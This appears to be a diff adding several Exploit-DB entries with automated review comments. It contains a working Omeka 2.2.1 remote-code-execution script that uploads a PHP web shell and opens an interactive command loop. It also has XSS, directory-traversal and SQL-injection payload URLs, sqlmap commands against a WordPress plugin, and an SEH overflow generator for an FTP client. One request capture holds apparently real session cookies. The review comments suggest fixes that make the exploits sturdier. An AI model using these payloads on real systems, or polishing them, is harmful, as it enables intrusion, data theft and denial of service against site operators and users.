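+password = raw_input('\x20\x20[*] Enter password: ')
+login_data = urllib.urlencode({
+'username' : username,
+'password' : password,
+'remember' : '0',
+'submit' : 'Log In'
+})
+login = opener.open('http://'+host+'/'+path+'/admin/users/login', login_data)
+auth = login.read()
+for session in cj:
+sessid = session.name
+print '\x20\x20[*] Mapping session ID '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
+ses_chk = re.search(r'%s=\w+' % sessid , str(cj))
+cookie = ses_chk.group(0)
+print '\x20\x20[*] Cookie: '+Fore.YELLOW+cookie+Fore.RESET
+if re.search(r'Login information incorrect. Please try again.', auth):
+print '\x20\x20[*] Faulty credentials given '+'.'*30+Fore.RED+'[ER]'+Fore.RESET
+print
+sys.exit()
+else:
+print '\x20\x20[*] Authenticated '+'.'*41+Fore.GREEN+'[OK]'+Fore.RESET
+disable_file_validation = urllib.urlencode({
+'disable_default_file_validation' : '1',
+'submit' : 'Save+Changes'
+})
+opener.open('http://'+host+'/'+path+'/admin/settings/edit-security', disable_file_validation)
+print '\x20\x20[*] Disabling file validation '+'.'*29+Fore.GREEN+'[OK]'+Fore.RESET
+class MultiPartForm(object):
+def __init__(self):
+self.form_fields = []
+self.files = []
+self.boundary = mimetools.choose_boundary()
+return
+def get_content_type(self):
+return 'multipart/form-data; boundary=%s' % self.boundary
+def add_field(self, name, value):
+self.form_fields.append((name, value))
+return
+def add_file(self, fieldname, filename, fileHandle, mimetype=None):
+body = fileHandle.read()
+if mimetype is None:
+mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
+self.files.append((fieldname, filename, mimetype, body))
+return
+def __str__(self):
+parts = []
+part_boundary = '--' + self.boundary
+parts.extend(
+[ part_boundary,
+'Content-Disposition: form-data; name="%s"' % name,
+'',
+value,
+]
+for name, value in self.form_fields
+)
+parts.extend(
+[ part_boundary,
+'Content-Disposition: file; name="%s"; filename="%s"' % \
+(field_name, filename),
+'Content-Type: %s' % content_type,
+'',
+body,
+]
+for field_name, filename, content_type, body in self.files
+)
+flattened = list(itertools.chain(*parts))
+flattened.append('--' + self.boundary + '--')
+flattened.append('')
+return '\r\n'.join(flattened)
+if __name__ == '__main__':
+form = MultiPartForm()
+form.add_field('public', '1')
+form.add_field('submit', 'Add Item')
+form.add_file('file[0]', 'thricerbd.php5',
+fileHandle=StringIO('<?php echo \"<pre>\"; passthru($_GET[\'cmd\']); echo \"</pre>\"; ?>'))
+request = urllib2.Request('http://'+host+'/'+path+'/admin/items/add')
+request.add_header('User-agent', 'joxypoxy 2.0')
+body = str(form)
+request.add_header('Content-type', form.get_content_type())
+request.add_header('Cookie', cookie)
+request.add_header('Content-length', len(body))
+request.add_data(body)
+request.get_data()
+print '\x20\x20[*] Sending payload '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET
+checkitemid = urllib2.urlopen(request).read()
+itemid = re.search('The item #(\d+)', checkitemid).group(1)
+print '\x20\x20[*] Getting item ID '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET
+print '\x20\x20[*] Item ID: '+Fore.YELLOW+itemid+Fore.RESET
+checkfileid = opener.open('http://'+host+'/'+path+'/admin/items/show/'+itemid)
+fileid = re.search('/admin/files/show/(\d+)', checkfileid.read()).group(1)
+print '\x20\x20[*] Getting file ID '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET
+print '\x20\x20[*] File ID: '+Fore.YELLOW+fileid+Fore.RESET
+print '\x20\x20[*] Getting file name '+'.'*37+Fore.GREEN+'[OK]'+Fore.RESET
+checkhash = opener.open('http://'+host+'/'+path+'/admin/files/show/'+fileid)
+hashfile = re.search('/files/original/(.+?).php5', checkhash.read()).group(1)
+print '\x20\x20[*] File name: '+Fore.YELLOW+hashfile+'.php5'+Fore.RESET
+print '\x20\x20[*] Starting logging service '+'.'*30+Fore.GREEN+'[OK]'+Fore.RESET
+print '\x20\x20[*] Spawning shell '+'.'*40+Fore.GREEN+'[OK]'+Fore.RESET
+time.sleep(1)
+furl = '/files/original/'+hashfile+'.php5'
+print
+today = datetime.date.today()
+fname = 'omeka-'+today.strftime('%d-%b-%Y')+time.strftime('_%H%M%S')+'.log'
+logging.basicConfig(filename=fname,level=logging.DEBUG)
+logging.info(' '+'+'*75)
+logging.info(' +')
+logging.info(' + Log started: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S'))
+logging.info(' + Title: Omeka 2.2.1 Remote Code Execution Exploit')
+logging.info(' + Python program executed: '+sys.argv[0])
+logging.info(' + Version: '+version)
+logging.info(' + Full query: \''+piton+'\x20'+host+'\x20'+path+'\'')
+logging.info(' + Username input: '+username)
+logging.info(' + Password input: '+password)
+logging.info(' + Vector: '+'http://'+host+'/'+path+furl)
+logging.info(' +')
+logging.info(' + Advisory ID: ZSL-2014-5194')
+logging.info(' + Zero Science Lab - http://www.zeroscience.mk')
+logging.info(' +')
+logging.info(' '+'+'*75+'\n')
+print Style.DIM+Fore.CYAN+'\x20\x20[*] Press [ ENTER ] to INSERT COIN!\n'+Style.RESET_ALL+Fore.RESET
+raw_input()
+while True:
+try:
+cmd = raw_input(Fore.RED+'shell@'+host+':~# '+Fore.RESET)
+execute = opener.open('http://'+host+'/'+path+furl+'?cmd='+urllib.quote(cmd))
+reverse = execute.read()
+pattern = re.compile(r'<pre>(.*?)</pre>',re.S|re.M)
+print Style.BRIGHT+Fore.CYAN
+cmdout = pattern.match(reverse)
+print cmdout.groups()[0].strip()
+print Style.RESET_ALL+Fore.RESET
+if cmd.strip() == 'exit':
+break
+logging.info('Command executed: '+cmd+'\n\nOutput: \n'+'='*8+'\n\n'+cmdout.groups()[0].strip()+'\n\n'+'-'*60+'\n')
+except Exception:
+break
+logging.warning('\n\nLog ended: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S')+'\n\nEND OF LOG')
+print '\x20\x20[*] Carpe commentarius '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
+print '\x20\x20[*] Log file: '+Fore.YELLOW+fname+Fore.RESET
+print
+sys.exit()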
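Review bot: Line 1505 writes the entered password in clear text into the DEBUG-level log file opened on line 1496, so every run leaves valid admin credentials for the target on disk next to the script; drop that line or write `logging.info(' + Password input: <redacted>')`. Lines 1406, 1478, 1482, 1487 and 1521 call .group()/.groups() on a regex result without checking for None, so any unexpected page content ends in an AttributeError instead of a message, and on line 1521 `pattern.match` additionally requires the `<pre>` block to start at byte 0 of the response, which a PHP notice printed before it would break — `cmdout = pattern.search(reverse)` followed by `if cmdout is None: continue` is more robust. The `except Exception: break` on line 1527 then hides all of these by silently leaving the loop and reporting a clean exit. Line 1418 switches off the site's file validation and nothing in the script restores it, so a test run leaves the target configuration changed; either re-enable the setting before exiting or state in the header that the operator must do it by hand. Only part of the script is indented in the page view, so the structure of the main block is inferred.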

11
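--- a/platforms/php/webapps/34157.txt
+++ b/platforms/php/webapps/34157.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/40941/info
+Firebook is prone to multiple cross-site scripting vulnerabilities and directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials and other harvested information may aid in launching further attacks.
+http://www.example.com/path_to_firebook_admin/?URLproxy=%3Cscript%3Ealert(document.cookie)%3C/script%3E
+http://www.example.com/guestbook/index.html?answer=%3Cscript%3Ealert(document.cookie)%3C/script%3E
+http://www.example.com/guestbook/index.html?answer=guestbook/guest/file.html;page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
+http://www.example.com/path_to_firebook_admin/?param=1;show=../.htaccess;
+http://www.example.com/guestbook/index.html?answer=guestbook/guest/%2E%2E/index.html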

10
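--- a/platforms/php/webapps/34159.txt
+++ b/platforms/php/webapps/34159.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/40964/info
+The Gallery XML Joomla! component is prone to an SQL-injection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
+An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database; by using directory-traversal strings to execute local script code in the context of the application, the attacker may be able to obtain sensitive information that may aid in further attacks.
+http://www.example.com/index.php?option=com_galleryxml&controller=[LFI]&task=catpics&gcatid=1
+http://www.example.com/index.php?option=com_galleryxml&controller=galpic&task=catpics&gcatid=-1 union select 1,2,3,4,5,6,concat(username,char(32),password),8,9,10,11,12 from jos_users -- '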

98
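--- a/platforms/php/webapps/34161.txt
+++ b/platforms/php/webapps/34161.txt
@@ -0,0 +1,98 @@
+?Wordpress Video Gallery
+######################
+# Exploit Title : Wordpress Video Gallery 2.5 SQL Injection and XSS Vulnerabilities
+# Exploit Author : Claudio Viviani
+# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery
+# Software Link : http://downloads.wordpress.org/plugin/contus-video-gallery.2.5.zip ( Fixed :\ )
+# Dork Google: inurl:/contus-video-gallery/hdflvplayer/hdplayer.swf
+(Click on "Repeat the search with the omitted results included")
+# Date : 2014-07-15
+# Tested on : Windows 7 / Mozilla Firefox
+Windows 7 / sqlmap (0.8-1)
+Linux / Mozilla Firefox
+Linux / sqlmap 1.0-dev-5b2ded0
+######################
+# Vulnerability Disclosure Timeline:
+2014-07-15: Discovered vulnerability
+2014-07-16: Vendor Notification (Support e-mail address)
+2014-07-17: Vendor Response/Feedback
+2014-07-23: Vendor Fix/Patch (same version number 2.5)
+2014-07-24: Public Disclosure
+# Description
+Wordpress Video Gallery 2.5 suffers from SQL injection and Cross Site Script vulnerabilities
+######################
+# PoC
+# Vulnerablity n°1:
+# SQL Injection 1 (Authentication NOT Required):
+1) Open the browser and connect to url http://VICTIM/wp-content/plugins/contus-video-gallery/myextractXML.php
+2) Copy a video_id number (ex. video_id="1")
+3) sqlmap -u "http://VICTIM/wp-admin/admin-ajax.php?action=myextractXML&vid=1" -p vid
+[21:02:40] [INFO] GET parameter 'vid' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
+...
+...
+...
+[21:03:34] [INFO] GET parameter 'vid' is 'MySQL > 5.0.11 AND time-based blind' injectable
+# SQL Injection 2 (Authentication Required):
+sqlmap --cookie="INSER_WORDPRESS_COOKIE_HERE" -u "http://VICTIM/wp-admin/admin.php?page=newplaylist&playlistId=1" -p playlistId
+sqlmap --cookie="INSER_WORDPRESS_COOKIE_HERE" -u "http://VICTIM/wp-admin/admin.php?page=newvideo&videoId=1" -p videoId
+######################
+# Vulnerablity n°2:
+# XSS Reflected Authenticated (/videoads/videoads.php, /video/video.php, /playlist/playlist.php )
+# PoC:
+POST
+Host=VICTIM
+User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
+Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language=it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding=gzip, deflate
+Referer=http://VICTIM/wp-admin/admin.php?page=videoads
+Cookie=wordpress_b43b255bc018ee66673cd91980a723bf=usertest%7C1405626269%7Ce1559aa048ec23f2ddbb5a40290a3d2e; wp-settings-1=advImgDetails%3Dshow%26libraryContent%3Dupload%26wpfb_adv_uploader%3D1%26editor%3Dtinymce%26uploader%3D1; wp-settings-time-1=1405118515; bLicense54=true; __utma=86855576.2039073811.1404413871.1404413871.1404416567.2; __utmz=86855576.1404413871.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_fid=6EEA54B2DFA4150F-06C135149F70F3D9; wp-settings-time-2=1405287261; wp-settings-2=mfold%3Do%26libraryContent%3Dupload; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-AssetAdmin=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; redux_current_tab=0; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_b43b255bc018ee66673cd91980a723bf=usertest%7C1405626269%7Cd8c8ffae7aa7720d4fb3cb56537b1ea7
+Connection=keep-alive
+Content-Type=application/x-www-form-urlencoded
+Content-Length=110
+POSTDATA=videoadssearchQuery=<script>alert(1)</script>&page=videoads&videoadsearchbtn=Search+Video+Ads
+#####################
+Discovered By : Claudio Viviani
+http://www.homelab.it
+info@homelab.it
+homelabit@protonmail.ch
+https://www.facebook.com/homelabit
+https://twitter.com/homelabit
+https://plus.google.com/+HomelabIt1/
+#####################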
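Review bot: The request capture on line 1613 contains what appear to be the tester's own live WordPress session cookies (the wordpress_ and wordpress_logged_in_ values for user "usertest", plus analytics identifiers), while lines 1600-1601 use the placeholder `INSER_WORDPRESS_COOKIE_HERE` for the same material; the capture should be redacted to that same placeholder before publication. Line 1565 begins with a stray `?` that looks like a mis-decoded byte-order mark — presumably the file was saved as UTF-8 with BOM — and should be removed. The "Software Link" on line 1570 points, as its own "( Fixed :\ )" remark says, to the already-patched 2.5 package, and line 1583 confirms the fix kept the version number, so the advisory cannot be reproduced from that link; giving the release date or a checksum of the vulnerable build would help.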


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40885/info
Adobe SVG Viewer is prone to a remote code-execution vulnerability.
Attackers can exploit this issue to execute arbitrary code in the context of the application. Failed attacks may cause a denial-of-service condition.
Adobe SVG Viewer 3.03 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/34151.rar


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40945/info
Chrome Engine 4 is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to crash the affected server, resulting in denial-of-service conditions.
Chrome Engine version 4 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/34158.zip

55
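--- a/platforms/windows/dos/34162.py
+++ b/platforms/windows/dos/34162.py
@@ -0,0 +1,55 @@
+#-----------------------------------------------------------------------------#
+# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) #
+# Date: Jul 24 2014 #
+# Exploit Author: Gabor Seljan #
+# Software Link: http://www.bpftp.com/ #
+# Version: 2010.75.0.76 #
+# Tested on: Windows XP SP3 #
+# CVE: CVE-2014-2973 #
+#-----------------------------------------------------------------------------#
+'''
+(a00.9e4): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=41414141 ebx=41414141 ecx=007ef590 edx=00000000 esi=017a4f6a edi=017a516a
+eip=005c005b esp=0012f594 ebp=0012f610 iopl=0 nv up ei pl zr na pe nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
+*** ERROR: Symbol file could not be found. Defaulted to export symbols for bpftpclient.exe -
+bpftpclient+0x1c005b:
+005c005b f6431c10 test byte ptr [ebx+1Ch],10h ds:0023:4141415d=??
+0:000> !exchain
+0012f59c: bpftpclient+1c044e (005c044e)
+0012f5a8: bpftpclient+1c046b (005c046b)
+0012f618: 43434343
+Invalid exception stack at 42424242
+0:000> g
+(a00.9e4): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000000 ebx=00000000 ecx=43434343 edx=7c9032bc esi=00000000 edi=00000000
+eip=43434343 esp=0012f1c4 ebp=0012f1e4 iopl=0 nv up ei pl zr na pe nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
+43434343 ?? ???
+'''
+#!/usr/bin/python
+junk1 = b'\x41' * 89
+nSEH = b'\x42' * 4
+SEH = b'\x43' * 4
+junk2 = b'\x44' * 1000
+sploit = junk1 + nSEH + SEH + junk2
+try:
+print('[+] Creating exploit file...')
+f = open('sploit.txt', 'wb')
+f.write(sploit)
+f.close()
+print('[+] Exploit file created successfully!')
+except:
+print('[!] Error while creating exploit file!')
+print('[+] Use the following as Server Name/IP with any user\'s credentials!')
+print(sploit.decode())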
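Review bot: The `#!/usr/bin/python` on line 1684 comes after the comment header and the docstring, so it is an ordinary comment there and the file is not directly executable; it belongs on line 1. The bare `except:` on line 1696 also swallows KeyboardInterrupt and SystemExit and reports them as a file error, and a write failure on line 1693 leaves the handle opened on line 1692 unclosed; `with open('sploit.txt', 'wb') as f:` / `f.write(sploit)` together with `except (IOError, OSError) as exc:` closes the file on every path and lets the real error be printed. The WinDbg transcript in the docstring (lines 1660-1683) has no caption; a lead line such as `WinDbg output after loading sploit.txt into the Server Name/IP field:` would tell the reader what the dump shows and why the registers and !exchain entries carry the 0x41/0x42/0x43 values defined on lines 1685-1687. The try block's indentation is lost in the page view, so its extent is inferred.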